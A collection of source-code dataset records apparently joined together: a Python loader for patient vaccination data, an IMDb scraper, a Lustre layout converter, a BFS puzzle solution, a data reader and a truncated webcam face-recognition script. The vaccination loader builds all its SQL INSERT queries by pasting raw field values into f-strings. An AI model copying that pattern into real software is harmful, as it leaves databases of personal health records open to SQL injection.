paises').set_index('codigo')\r\nestados_db = db.query('SELECT id, codigo FROM estados').set_index('codigo')\r\nmunicipios_db = db.query('SELECT id, codigo FROM municipios').set_index('codigo')\r\nfabricantes_db = db.query('SELECT id, referencia FROM fabricantes').set_index('referencia')\r\ngrupos_de_atendimento_db = db.query('SELECT id, nome FROM grupos_de_atendimento').set_index('id')\r\ncategorias_db = db.query('SELECT id, nome FROM categorias').set_index('id')\r\nvacinas_db = db.query('SELECT id, nome FROM vacinas').set_index('id')\r\nsistemas_db = db.query('SELECT id, nome FROM sistemas').set_index('nome')\r\nestabelecimentos_db = db.query('SELECT id, estado_id FROM estabelecimentos').set_index('id')\r\ntipos_de_dose_db = db.query('SELECT id, descricao FROM tipos_de_dose').set_index('descricao')\r\n\r\n\r\n# A funções abaixo servem para criar as colunas de chave estrangeiras, que irão ligar um dado a uma outra tabela\r\n# 1. Verifica se o dado ja existe no BD\r\n# 2. Se já existe pega o ID, se nao existe insere e pega o ID\r\n# 3. Atualiza a tabela local pra garantir a validade das próximas verificações\r\n\r\n\r\ndef add_column_sexo_id(sexo):\r\n sexo = sexo.upper() if type(sexo) == str else 99\r\n if(sexo in sexos_db.index):\r\n return sexos_db.loc[sexo]['id']\r\n else:\r\n id = db.execute(f'''INSERT INTO sexos(codigo, nome) VALUES ('{sexo}', '{sexo}')''')\r\n sexos_db.loc[sexo] = [None]\r\n return id\r\n\r\ndef add_column_raca_id(row):\r\n raca_id = row['paciente_raca_codigo']\r\n raca_id = 99 if math.isnan(int(raca_id)) else int(raca_id)\r\n raca_nome = row['paciente_raca_nome']\r\n if(raca_id in racas_db.index):\r\n return raca_id\r\n else:\r\n id = db.execute(f'''INSERT INTO racas(id, nome) VALUES ('{raca_id}', '{raca_nome}')''')\r\n racas_db.loc[raca_id] = [None]\r\n return raca_id\r\n\r\ndef add_column_nacionalidade_id(nacionalidade):\r\n nacionalidade = nacionalidade.upper() if type(nacionalidade) == str else '99'\r\n if(nacionalidade in nacionalidades_db.index):\r\n return nacionalidades_db.loc[nacionalidade]['id']\r\n else:\r\n id = db.execute(f'''INSERT INTO nacionalidades(codigo, nome) VALUES ('{nacionalidade}', '{nacionalidade}')''')\r\n nacionalidades_db.loc[nacionalidade] = [None]\r\n return id\r\n\r\ndef add_column_municipio_id(row):\r\n municipio_id = row['paciente_municipio_codigo']\r\n if municipio_id=='':\r\n municipio_id=9999\r\n #print(municipio_id)\r\n municipio_id = 9999 if math.isnan(int(municipio_id)) else int(municipio_id)\r\n municipio_nome = row['paciente_municipio_nome'].replace(\"'\", '') if type(row['paciente_municipio_nome']) == str else ''\r\n if(municipio_id in municipios_db.index):\r\n return municipios_db.loc[municipio_id]['id']\r\n else:\r\n id = db.execute(f'''INSERT INTO municipios(codigo, nome) VALUES ('{municipio_id}', '{municipio_nome}')''')\r\n municipios_db.loc[municipio_id] = [None]\r\n return id\r\n\r\ndef add_column_estado_id(estado):\r\n estado = estado.upper() if type(estado) == str else 99\r\n if(estado in estados_db.index):\r\n return estados_db.loc[estado]['id']\r\n else:\r\n id = db.execute(f'''INSERT INTO estados(codigo, nome) VALUES ('{estado}', '{estado}')''')\r\n estados_db.loc[estado] = [None]\r\n return id\r\n\r\n\r\n\r\ndef add_column_pais_id(row):\r\n pais_id = row['paciente_pais_codigo']\r\n if pais_id=='':\r\n pais_id=999\r\n pais_id = 999 if math.isnan(int(pais_id)) else int(pais_id)\r\n pais_nome = row['paciente_pais_nome']\r\n if(pais_id in paises_db.index):\r\n return paises_db.loc[pais_id]['id']\r\n else:\r\n id = db.execute(f'''INSERT INTO paises(codigo, nome) VALUES ('{pais_id}', '{pais_nome}')''')\r\n paises_db.loc[pais_id] = [None]\r\n return id\r\n\r\ndef add_column_estabelecimento_municipio_id(row):\r\n est_municipio_id = row['estabelecimento_municipio_codigo']\r\n est_municipio_id = 9999 if math.isnan(est_municipio_id) else int(est_municipio_id)\r\n est_municipio_nome = row['estabelecimento_municipio_nome'].replace(\"'\", '') if type(row['estabelecimento_municipio_nome']) == str else ''\r\n if(est_municipio_id in municipios_db.index):\r\n return municipios_db.loc[est_municipio_id]['id']\r\n else:\r\n id = db.execute(f'''INSERT INTO municipios(codigo, nome) VALUES ('{est_municipio_id}', '{est_municipio_nome}')''')\r\n municipios_db.loc[est_municipio_id] = [None]\r\n return id\r\n\r\ndef add_column_estabelecimento_estado_id(estado):\r\n estado = estado.upper() if type(estado) == str else 99\r\n if(estado in estados_db.index):\r\n return estados_db.loc[estado]['id']\r\n else:\r\n id = db.execute(f'''INSERT INTO estados(codigo, nome) VALUES ('{estado}', '{estado}')''')\r\n estados_db.loc[estado] = [None]\r\n return id\r\n\r\ndef add_column_estabelecimento_id(row):\r\n est_id = row['estabelecimento_codigo']\r\n if est_id=='':\r\n est_id=9999\r\n est_id = 99999 if math.isnan(int(est_id)) else int(est_id)\r\n est_razao_social = row['estabelecimento_razao_social']\r\n est_nome = row['estabelecimento_nome']\r\n est_estado_id = row['estabelecimento_estado_id']\r\n est_municipio_id = row['estabelecimento_municipio_id']\r\n if(est_id in estabelecimentos_db.index):\r\n return est_id\r\n else:\r\n id = db.execute(f'''INSERT INTO estabelecimentos(id, razao_social, nome, municipio_id, estado_id) VALUES ({est_id}, '{est_razao_social}', '{est_nome}', '{est_municipio_id}', '{est_estado_id}')''')\r\n estabelecimentos_db.loc[est_id] = [None]\r\n return est_id\r\n\r\ndef add_column_vacina_id(row):\r\n vacina_id = row['vacina_codigo']\r\n if( vacina_id=='' or vacina_id==None):\r\n vacina_id=99\r\n vacina_id = 99 if math.isnan(int(vacina_id)) else int(vacina_id)\r\n vacina_nome = row['vacina_nome']\r\n if(vacina_id in vacinas_db.index):\r\n return vacina_id\r\n else:\r\n id = db.execute(f'''INSERT INTO vacinas(id, nome) VALUES ('{vacina_id}', '{vacina_nome}')''')\r\n vacinas_db.loc[vacina_id] = [None]\r\n return vacina_id\r\n\r\ndef add_column_categoria_id(row):\r\n categoria_id = row['vacina_categoria_codigo']\r\n if categoria_id=='' or categoria_id ==None:\r\n categoria_id = 99 \r\n #print(categoria_id) \r\n categoria_id = 99 if math.isnan(int(categoria_id)) else int(categoria_id)\r\n categoria_nome = row['vacina_categoria_nome']\r\n if(categoria_id in categorias_db.index):\r\n return categoria_id\r\n else:\r\n id = db.execute(f'''INSERT INTO categorias(id, nome) VALUES ('{categoria_id}', '{categoria_nome}')''')\r\n categorias_db.loc[categoria_id] = [None]\r\n return categoria_id\r\n\r\ndef add_column_grupo_de_atendimento_id(row):\r\n grp_atd_id = row['grupo_atendimento_codigo']\r\n if grp_atd_id=='' or grp_atd_id ==None:\r\n grp_atd_id = 99 \r\n else:\r\n grp_atd_id=int(grp_atd_id)\r\n grp_atd_id = 99 if math.isnan(grp_atd_id) else int(grp_atd_id)\r\n grp_atd_nome = row['grupo_atendimento_nome']\r\n if(grp_atd_id in grupos_de_atendimento_db.index):\r\n return grp_atd_id\r\n else:\r\n id = db.execute(f'''INSERT INTO grupos_de_atendimento(id, nome) VALUES ('{grp_atd_id}', '{grp_atd_nome}')''')\r\n grupos_de_atendimento_db.loc[grp_atd_id] = [None]\r\n return grp_atd_id\r\n\r\ndef add_column_sistema_id(sistema):\r\n sistema = sistema.upper()\r\n if(sistema in sistemas_db.index):\r\n return sistemas_db.loc[sistema]['id']\r\n else:\r\n id = db.execute(f'''INSERT INTO sistemas(nome) VALUES ('{sistema}')''')\r\n sistemas_db.loc[sistema] = [None]\r\n return id\r\n\r\ndef add_column_fabricante_id(row):\r\n fabricante_id = row['fabricante_referencia'].upper() if type(row['fabricante_referencia']) == str else '99'\r\n fabricante_nome = 'Sem referencia' if fabricante_id == '99' else row['fabricante_nome']\r\n if(fabricante_id in fabricantes_db.index):\r\n return fabricantes_db.loc[fabricante_id]['id']\r\n else:\r\n id = db.execute(f'''INSERT INTO fabricantes(referencia, nome) VALUES ('{fabricante_id}', '{fabricante_nome}')''')\r\n fabricantes_db.loc[fabricante_id] = [None]\r\n return id\r\n\r\ndef add_column_tipo_de_dose_id(dose):\r\n tipo_de_dose_id = dose.upper() if type(dose) == str else '99'\r\n if(tipo_de_dose_id in tipos_de_dose_db.index):\r\n return tipos_de_dose_db.loc[tipo_de_dose_id]['id']\r\n else:\r\n id = db.execute(f'''INSERT INTO tipos_de_dose(descricao) VALUES ('{tipo_de_dose_id}')''')\r\n print('tipo de dose:', tipo_de_dose_id, id)\r\n tipos_de_dose_db.loc[tipo_de_dose_id] = [None]\r\n return id\r\n\r\ndef register_pacientes(row):\r\n paciente_id = row['paciente_id']\r\n data_nascimento = format_date(row['paciente_data_nascimento'])\r\n sexo_id = row['paciente_sexo_id']\r\n raca_id = row['paciente_raca_id']\r\n nacionalidade_id = row['paciente_nacionalidade_id']\r\n pais_id = row['paciente_pais_id']\r\n estado_id = row['paciente_estado_id']\r\n municipio_id = row['paciente_municipio_id']\r\n cep = row['paciente_cep']\r\n if(paciente_id in pacientes_db.index):\r\n return paciente_id\r\n else:\r\n id = db.execute(f'''INSERT INTO pacientes(\r\n id, data_nascimento, sexo_id, raca_id, nacionalidade_id, pais_id, estado_id, municipio_id, cep)\r\n VALUES ('{paciente_id}', {data_nascimento}, '{sexo_id}', '{raca_id}', '{nacionalidade_id}', '{pais_id}', '{estado_id}', '{municipio_id}', '{cep}')''')\r\n pacientes_db.loc[paciente_id] = [None]\r\n return id\r\n\r\ndef register_data(row):\r\n id = row['id']\r\n paciente_id = row['paciente_id']\r\n estabelecimento_id = row['estabelecimento_id']\r\n grupo_atendimento_id = row['grupo_atendimento_id']\r\n categoria_id = row['categoria_id']\r\n vacina_lote = row['vacina_lote']\r\n fabricante_id = row['fabricante_id']\r\n data_aplicacao = format_date(row['data_aplicacao'])\r\n vacina_id = row['vacina_id']\r\n sistema_origem_id = row['sistema_origem_id']\r\n data_importacao_rnds = format_date(row['data_importacao_rnds'])\r\n tipo_de_dose_id = row['tipo_de_dose_id']\r\n\r\n db.execute(f'''INSERT IGNORE INTO registros(id, paciente_id, estabelecimento_id, grupo_atendimento_id, categoria_id,\r\n vacina_id, fabricante_id, vacina_lote, data_aplicacao, tipo_de_dose_id, sistema_origem_id, data_importacao_rnds) \r\n VALUES ('{id}', '{paciente_id}', '{estabelecimento_id}', '{grupo_atendimento_id}', '{categoria_id}', \r\n '{vacina_id}', '{fabricante_id}', '{vacina_lote}', {data_aplicacao}, '{tipo_de_dose_id}', '{sistema_origem_id}', {data_importacao_rnds})''')\r\n \r\ntry:\r\n # Cria as colunas de chaves estrangeiras e registra os valores em suas respectivas tabelas\r\n print('Processando coluna sexo id')\r\n data['paciente_sexo_id'] = data['paciente_sexo'].apply(add_column_sexo_id)\r\n db.commit()\r\n\r\n print('Processando coluna raca id')\r\n data['paciente_raca_id'] = data.apply(add_column_raca_id, axis=1)\r\n db.commit()\r\n\r\n print('Processando coluna nacionalidade id')\r\n data['paciente_nacionalidade_id'] = data['paciente_nacionalidade'].apply(add_column_nacionalidade_id)\r\n db.commit()\r\n\r\n data['paciente_pais_id'] = data.apply(add_column_pais_id, axis=1)\r\n data['paciente_estado_id'] = data['paciente_estado'].apply(add_column_estado_id)\r\n db.commit()\r\n\r\n print('Processando coluna municipio id')\r\n data['paciente_municipio_id'] = data.apply(add_column_municipio_id, axis=1)\r\n db.commit()\r\n\r\n print('Processando coluna estabelecimento estado id')\r\n data['estabelecimento_estado_id'] = data['estabelecimento_estado'].apply(add_column_estado_id)\r\n db.commit()\r\n\r\n print('Processando coluna estabelecimento municipio id')\r\n data['estabelecimento_municipio_id'] = data.apply(add_column_municipio_id, axis=1)\r\n db.commit()\r\n\r\n print('Processando coluna estabelecimento id')\r\n data['estabelecimento_id'] = data.apply(add_column_estabelecimento_id, axis=1)\r\n db.commit()\r\n\r\n print('Processando coluna categoria id')\r\n data['categoria_id'] = data.apply(add_column_categoria_id, axis=1)\r\n db.commit()\r\n\r\n print('Processando coluna vacina id')\r\n data['vacina_id'] = data.apply(add_column_vacina_id, axis=1)\r\n db.commit()\r\n\r\n print('Processando coluna atendimento id')\r\n data['grupo_atendimento_id'] = data.apply(add_column_grupo_de_atendimento_id, axis=1)\r\n db.commit()\r\n\r\n print('Processando sistema origem id')\r\n data['sistema_origem_id'] = data['sistema_origem'].apply(add_column_sistema_id)\r\n db.commit()\r\n\r\n print('Processando coluna fabricante id')\r\n data['fabricante_id'] = data.apply(add_column_fabricante_id, axis=1)\r\n db.commit()\r\n\r\n print('Processando coluna tipo de dose id')\r\n data['tipo_de_dose_id'] = data['descricao_dose'].apply(add_column_tipo_de_dose_id)\r\n db.commit()\r\n\r\n print('Fazendo registro dos dados')\r\n # Registra os dados principais\r\n chunk_size = 5000\r\n chunk_index = 0\r\n chunk_total = math.ceil(data.shape[0] / chunk_size)\r\n while(True):\r\n chunk = data[chunk_index*chunk_size:chunk_index*chunk_size + chunk_size]\r\n print(f'Processando pacientes, chunk {chunk_index}/{chunk_total}')\r\n if(chunk.size == 0):\r\n break\r\n\r\n chunk.apply(register_pacientes, axis=1)\r\n db.commit()\r\n chunk_index += 1\r\n\r\n chunk_size = 5000\r\n chunk_index = 0\r\n chunk_total = math.ceil(data.shape[0] / chunk_size)\r\n while(True):\r\n chunk = data[chunk_index*chunk_size:chunk_index*chunk_size + chunk_size]\r\n print(f'Processando dados principais, chunk {chunk_index}/{chunk_total}')\r\n if(chunk.size == 0):\r\n break\r\n\r\n chunk.apply(register_data, axis=1)\r\n db.commit()\r\n chunk_index += 1\r\n \r\nexcept Exception as e:\r\n print('Error message:', e)\r\n traceback.print_exc()\r\n db.rollback()\r\n\r\n\r\nend = time.time()\r\nprint('Duration in secs:', end - start)","sub_path":"normalizer_modified.py","file_name":"normalizer_modified.py","file_ext":"py","file_size_in_byte":19004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"91769523","text":"import re\nimport scrapy\nfrom Imdb.items import MovieItem, CastItem\n\nclass ImdbSpider(scrapy.Spider):\n\tname = \"imdb\"\n\tallow_domains = [\"imdb.com\"]\n\tstart_urls = [\n\t\t# Top 250 list of English movies\n\t\t\"http://www.imdb.com/chart/top?ref_=nv_ch_250_4\",\n\t]\n\n\t# parsing the top 250 IMDB page and doing the callback request to each title link\n\tdef parse(self, response):\n\t\t# self.wanted_num = 10\n\t\tfor sel in response.xpath('//table[@class=\"chart full-width\"]/tbody/tr'):\n\t\t\titem = MovieItem()\n\t\t\titem['title'] = sel.xpath('td[2]/a/text()').extract_first()\n\t\t\titem['rating'] = sel.xpath('td[3]/strong/text()').extract_first()\n\t\t\titem['ranking'] = sel.xpath('td[1]/span[1]/@data-value').extract_first()\n\t\t\titem['release_year'] = sel.xpath('td[2]/span/text()').re(r'\\d+')[0]\n\t\t\tmain_page_url = sel.xpath('td[2]/a/@href').extract_first()\n\t\t\titem['main_page_url'] = response.urljoin(main_page_url)\n\n\t\t\trequest = scrapy.Request(item['main_page_url'], callback=self.parse_movie_details)\n\t\t\trequest.meta['item'] = item\n\n\t\t\t# if int(item['ranking']) > self.wanted_num:\n\t\t\t# \treturn\n\t\t\tyield request\t \n\n\tdef parse_movie_details(self, response):\n\t\titem = response.meta['item']\n\t\titem = self.get_basic_film_info(item, response)\n\t\titem = self.get_technical_details(item, response)\n\t\titem = self.get_cast_member_info(item, response)\n\t\treturn item\t\t\n\n\tdef get_basic_film_info(self, item, response):\n\t\titem['director'] = response.xpath('//div/span[@itemprop=\"director\"]/a/span/text()').extract_first()\n\t\titem['writers'] = response.xpath('//div/span[@itemprop=\"creator\"]/a/span/text()').extract_first()\n\t\titem['sinopsis'] = response.xpath('//div[@itemprop=\"description\"]/text()').extract_first()\n\t\titem['genres'] = response.xpath('//div[@itemprop=\"genre\"]/a/text()').extract()\n\t\titem['mppa_rating'] = response.xpath('//span[@item=\"contentRating\"]/text()').extract_first()\n\t\treturn item\n\n\tdef get_cast_member_info(self, item, response):\n\t\titem['cast_members']\t= []\n\t\tfor index, cast_member in enumerate(response.xpath('//div[@id=\"titleCast\"]/table/tr')):\n\t\t\tif index == 0:\n\t\t\t\tcontinue\n\n\t\t\tcast = CastItem()\n\t\t\tcast['ranking'] = index\n\t\t\tcast['actor_name'] = self.get_index(cast_member.xpath('td[2]/a/text()').extract())\n\t\t\tcast['character_name'] = self.get_index(cast_member.xpath('td[4]/div/a/text()').extract())\n\t\t\titem['cast_members'].append(cast)\n\n\t\treturn item\n\t\t\n\tdef get_technical_details(self, item, response):\n\t\t# set default value for the item without values\n\t\tfor index, details in enumerate(response.xpath('//*[@id=\"titleDetails\"]/div')):\n\t\t\ttitleDetails = details.xpath('h4/text()').extract()\n\t\t\tif titleDetails:\n\t\t\t\titem = self.map_film_details(response, self.get_index(titleDetails), item, index)\n\n\t\treturn item\t\t\n\n\tdef map_film_details(self, response, titleDetails, item, index):\n\n\t\tindex += 1\n\n\t\tif titleDetails:\n\t\t\tif 'Language' in titleDetails:\n\t\t\t\titem['language'] = self.get_index(self.get_title_details(response, index))\n\t\t\telif 'Country' in titleDetails:\n\t\t\t\titem['country'] = self.get_index(self.get_title_details(response, index))\n\t\t\telif 'Budget' in titleDetails:\n\t\t\t\titem['budget'] = self.get_index(self.get_title_details(response, index))\n\t\t\telif 'Gross' in titleDetails:\n\t\t\t\titem['gross_profit'] = self.get_index(self.get_title_details(response, index))\n\t\t\telif 'Opening Weekend' in titleDetails:\n\t\t\t\titem['opening_weekend_profit'] = self.get_index(self.get_title_details(response, index))\n\t\t\telif 'Sound Mix' in titleDetails:\n\t\t\t\titem['sound_mix'] = self.get_index(self.get_title_details(response, index))\n\t\t\telif 'Color' in titleDetails:\n\t\t\t\titem['color'] = self.get_index(self.get_title_details(response, index))\n\t\t\telif 'Aspect Ratio' in titleDetails:\n\t\t\t\titem['aspect_ratio'] = self.get_index(self.get_title_details(response, index), 1)\n\t\t\telif 'Runtime:' in titleDetails:\n\t\t\t\titem['runtime'] = self.get_index(self.get_title_details(response, index))\n\t\treturn item\n\n\tdef get_title_details(self, response, index):\n\t\t\treturn response.xpath('//div[@id=\"titleDetails\"]/div['+str(index)+']/a/text()').extract()\t\n\n\tdef get_index(self, item, index=0):\n\t\tif item:\n\t\t\treturn item[index]\n\t\telse:\n\t\t\treturn item\t\t\t\t\t\n\n\t\n\n","sub_path":"Imdb/Imdb/spiders/imdb_spider.py","file_name":"imdb_spider.py","file_ext":"py","file_size_in_byte":4121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"102956792","text":"import ConfigParser\nimport time\nimport os\nimport math\n\nconfig = ConfigParser.ConfigParser()\nconfig.read('pfl_config1.ini')\n\nbuckets = config.get('Client','Buckets')\n\nap = 65536\n\nstripe = [0] * (int(buckets) + 1)\nextents = [0] * (int(buckets) + 1)\n\nfor i in range(int(buckets)):\n\tbucketID = 'Bucket_' + str(i+1)\n\textent = config.get(bucketID, 'Extent')\n\tstripe[i + 1] = config.get(bucketID, 'Stripe')\n\tif extent[-1] == 'K':\n\t\textents[i + 1] = int(extent[:-1])*1024\n\telif extent[-1] == 'M':\n extents[i + 1] = int(extent[:-1])*1024*1024\n\telif extent[-1] == 'G':\n extents[i + 1] = int(extent[:-1])*1024*1024*1024\n\telif extent[-1] == 'T':\n extents[i + 1] = int(extent[:-1])*1024*1024*1024*1024\n\telif extent == '-1':\n\t\textents[i + 1] = -1\n\telse:\n\t\textents[i + 1] = int(extent[:-1])\n\n#print stripe\n#print extents\n\npath = os.path.dirname(os.path.realpath(__file__))\n#print path\n\nfilename_trace = 'traces_ior_pfl_SSF.txt'\nfilename_presql = 'presql.txt'\n\ndestfile_trace = path + '/' + filename_trace\ndestfile_presql = path + '/' + filename_presql\n\nif os.path.isfile(destfile_presql):\n \tos.remove(destfile_presql)\n\nf_presql = open(destfile_presql, 'a+')\n\nf_presql.write('name,size,lcmeID,eStart,eEnd,stripes,stripesize,ranks,ost,inUse\\n')\n\nwith open(destfile_trace) as f_trace:\n\tnext(f_trace)\n\tfor line in f_trace:\n\t\tdif = line.split(',')\n\t\tfor i in range(int(buckets)):\n\t\t\tname = dif[0]\n\t\t\tsize = dif[1]\n\t\t\tlcmeID = i + 1\n\t\t\teStart = extents[i]\n\t\t\teEnd = extents[i+1]\n\t\t\tif eEnd == -1:\n\t\t\t\teEnd = size\n\t\t\tstripes = stripe[i+1]\n\t\t\twritebytes = int(eEnd) - int(eStart)\n\t\t\t#if stripesize < 0:\n\t\t\t\t#stripesize = 0\n\t\t\t#print \"Size: \",size\n\t\t\t#print eStart\n\t\t\t#print eEnd\n\t\t\tif int(eStart) > int(size):\n\t\t\t\t#print \"start>size\"\n\t\t\t\tstripesize = 0\n\t\t\t\tif int(eEnd) < int(eStart):\n\t\t\t\t\teEnd = 34359738368\n\t\t\tif int(eStart) < int(size) and int(eEnd) > int(size):\n\t\t\t\t#print \"1\"\n\t\t\t\t#eEnd = size\n\t\t\t\twritebytes = int(size) - int(eStart)\n\t\t\t#print writebytes\n\t\t\tn = math.ceil(float(writebytes)/float(ap*2*int(stripes)))\n\t\t\tstripesize = ap * 2 * n\n\t\t\tif stripesize < 0:\n stripesize = 0\n\t\t\tranks = str(dif[2]).strip()\n\t\t\tost = -1\n\t\t\tinUse = 0\n\t\t\tmsg = str(name) + ',' + str(size) + ',' + str(lcmeID) + ',' + str(eStart) + ',' + str(eEnd) + ',' + str(stripes) + ',' + str(int(stripesize)) + ',' + str(ranks) + ',' + str(ost) + ',' + str(inUse)\n\t\t\t#msg = msg.replace('\\n','')\n\t\t\tf_presql.write(msg+'\\n')\n\nf_presql.close()\n","sub_path":"PFL_Arnab/Client/configToTxt.py","file_name":"configToTxt.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"258904531","text":"from collections import deque\n\nt = int(input())\n\ndy = [-1, 1, 0, 0]\ndx = [0, 0, -1, 1]\n\ndef bfs(graph, start, visited):\n if visited[start[0]][start[1]] != 0: # 방문 처리되지 않은 경우\n queue = deque([start])\n visited[start[0]][start[1]] = 0\n while queue:\n v = queue.popleft()\n for i in graph[v]:\n if visited[i[0]][i[1]] != 0:\n queue.append(i)\n visited[i[0]][i[1]] = 0\n return True\n return False\n \nfor _ in range(t):\n m, n, k = map(int, input().split())\n loc = [[0]*m for _ in range(n)] # 배추의 위치\n for _ in range(k):\n x, y = map(int, input().split())\n loc[y][x] = 1\n graph = {}\n for i in range(n):\n for j in range(m):\n if loc[i][j] == True:\n graph[(i,j)] = []\n for d in range(4):\n if 0 <= i+dy[d] <= n-1 and 0 <= j+dx[d] <= m-1:\n if loc[i+dy[d]][j+dx[d]] == True:\n graph[(i,j)].append((i+dy[d],j+dx[d]))\n result = 0\n for i in range(n):\n for j in range(m):\n if bfs(graph, (i,j), loc) == True:\n result += 1\n print(result)","sub_path":"BOJ/1012.py","file_name":"1012.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"545319047","text":"#/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n'My First Module File'\r\n__author__ = \"Donald.Zhuang\"\r\n\r\nimport sys\r\n\r\ndef hello_world():\r\n args = sys.argv\r\n if len(args) == 1:\r\n print(\"Hello world!\")\r\n elif len(args) == 2:\r\n print(\"Hello %s\", args(1))\r\n else:\r\n print(\"Too Many Parameters!\")\r\n\r\nif __name__ == '__main__':\r\n hello_world()","sub_path":"base/partitial.py","file_name":"partitial.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"337166740","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Aug 13 18:01:27 2018\r\n\r\n@author: USER\r\n\"\"\"\r\n\r\n# Codes are free to use. Do whatever you want\r\n\r\nfrom __future__ import absolute_import\r\n\r\n\"\"\"Read raw data\"\"\"\r\n\r\n####################### LIBRARY #############################\r\n\r\n# exceptions library\r\nfrom exceptions import (Illegal_Filename_Exception, \r\n Data_Format_Exception)\r\n\r\n# Python stdlib imports\r\nimport datetime\r\nimport re\r\nimport os\r\n\r\n# data processing library\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\n# pyrod library\r\n\r\n####################### CONSTANT ############################\r\n\r\n# constant \r\n#regex of raw_data, parameters, sheet names\r\n\r\nRAW_DATA_DAT = re.compile('^\\d\\dL\\.dat$')\r\nRAW_DATA_XLSX = re.compile('^\\d\\dL\\.xlsx$')\r\n\r\n####################### FUNCTIONS ###########################\r\n\r\n\r\n \r\n######################## CLASSS #############################\r\n\r\nclass initialization_rhkl(object):\r\n \r\n def __init__(self,\r\n raw_data = '00L.xlsx'):\r\n \r\n self.raw_data = raw_data\r\n self.path = os.path.abspath(os.path.dirname(raw_data)) + '/' + raw_data\r\n \r\n # check raw_data\r\n self.check_raw_data_dat = 1\r\n self.check_raw_data_xlsx = 1\r\n \r\n # check file names\r\n # raw_data and parameters\r\n def _check_filename(self):\r\n \r\n \"\"\"legal names: xxL.xlsx or xxL.dat; parameters_xxx--.xlsx\"\"\"\r\n \r\n # check raw data, .dat or xlsx\r\n self.check_raw_data_dat = RAW_DATA_DAT.match(self.raw_data)\r\n self.check_raw_data_xlsx = RAW_DATA_XLSX.match(self.raw_data)\r\n \r\n if not (self.check_raw_data_dat or self.check_raw_data_xlsx):\r\n error = 'raw data name is illegal.appropriate file name: xxL.dat or xxL.xlsx'\r\n raise Illegal_Filename_Exception(error)\r\n \r\n\r\n def _read_rhkl(self, density = 100):\r\n \r\n \"\"\"Read origin data.default reconstruct data density is 100\"\"\"\r\n \r\n try:\r\n # if data is origin data form from APS .dat\r\n if 'dat' in self.raw_data:\r\n \r\n # open od-origin data\r\n raw_data = open(self.path)\r\n \r\n qz = []\r\n ie = []\r\n \r\n # read in line form\r\n for line in raw_data:\r\n \r\n lst = line.split()\r\n \r\n # float data\r\n qz.append(float(lst[0]))\r\n ie.append(float(lst[1]))\r\n \r\n # if data is xlsx, maybe modulated\r\n elif 'xlsx' in self.raw_data:\r\n \r\n # read excel data as matrix\r\n rd = pd.read_excel(self.path).as_matrix()\r\n \r\n qz = rd[:,0].tolist()\r\n ie = rd[:,1].tolist()\r\n \r\n except Data_Format_Exception:\r\n print('Data format of raw data is illegal')\r\n \r\n # interpolant data density. ensure the integrality of bragg peak\r\n # qs--q start\r\n qs = qz[ 0]\r\n # qe--q end\r\n qe = qz[-1]\r\n \r\n # interpolant data with default intensity 100 \r\n iq0 = 0.0\r\n iqs = round(qs*100)/100\r\n iqe = round(qe*100)/100\r\n \r\n iq= np.linspace(iq0, \r\n iqe,\r\n (iqe-iq0)/0.01+1)\r\n \r\n intensity = np.interp(iq,qz,ie)\r\n # the signal between iq0 and iqs is not detected\r\n intensity[0: int(iqs/0.001)] = 0\r\n \r\n return iq, intensity","sub_path":"read/read_raw_data.py","file_name":"read_raw_data.py","file_ext":"py","file_size_in_byte":3653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"460853045","text":"#capturing images for training for recognizers\n#stores them in data folder\n\nimport cv2, sys, os\nimport numpy as np\n\n\n#all the images will be in datasets folder\ndatasets = 'images'\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\ncascade_dir = os.path.join(BASE_DIR, \"data\")\nface_cascade = cv2.CascadeClassifier(cascade_dir + \"/\"+\"haarcascade_frontalface_alt2.xml\")\n\nwebcam = cv2.VideoCapture(0)\n\n### FUNCTION: FOR FETCHING THE IMAGES AND TRAINING THE MODEL\ndef capture_train():\n\t#sub-folder for storing specific images\n\tsub_folder=raw_input(\"Enter your name: \")\n\tpath = os.path.join(datasets, sub_folder)\n\tif not os.path.isdir(path):\n\t\tos.mkdir(path)\n\n\t#defining sizes of images\n\t(width, height) = (130, 100)\n\n\n\t#the program loops unitil it has caputred 30 images\n\tcount = 1\n\tprint('Taking images for training...')\n\twhile(count<100):\n\t\t(_, img) = webcam.read()\n\t\tgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\t\tfaces = face_cascade.detectMultiScale(gray, scaleFactor=1.3, minNeighbors=5)\n\t\t\n\t\tfor(x,y,w,h) in faces:\n\t\t\tcv2.rectangle(img, (x,y), (x+w, y+h), (0,0,255), 2)\n\t\t\tcv2.putText(img, 'Capturing Photo & Training', (x-10, y-10), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n\t\t\tface = gray[y:y+h, x:x+w]\n\t\t\tface_resize = cv2.resize(face, (width, height))\n\t\t\tcv2.imwrite('%s/% s.png' %(path, count), face_resize)\n\t\tcount += 1\n\n\t\tcv2.imshow('OpenCV', img)\n\t\tkey = cv2.waitKey(10)\n\t\tif key == 27:\n\t\t\tbreak\n\n### FUNCTION: FOR RECOGNIGING THE FACE\ndef face_recognizer():\n\t# Part 1: Create fisherRecognizer \n\tprint('Recognizing Face Please Be in sufficient Lights...')\n\t# Create a list of images and a list of corresponding names \n\t(images, lables, names, id_) = ([], [], {}, 0) \n\tfor (subdirs, dirs, files) in os.walk(datasets): \n\t for subdir in dirs: \n\t names[id_] = subdir \n\t subjectpath = os.path.join(datasets, subdir) \n\t for filename in os.listdir(subjectpath): \n\t path = subjectpath + '/' + filename \n\t # print(path)\n\t lable = id_\n\t images.append(cv2.imread(path, 0)) \n\t lables.append(int(lable)) \n\t id_ += 1\n\t(width, height) = (130, 100) \n\t \n\t# Create a Numpy array from the two lists above \n\t(images, lables) = [np.array(lis) for lis in [images, lables]] \n\t \n\t# OpenCV trains a model from the images \n\t# NOTE FOR 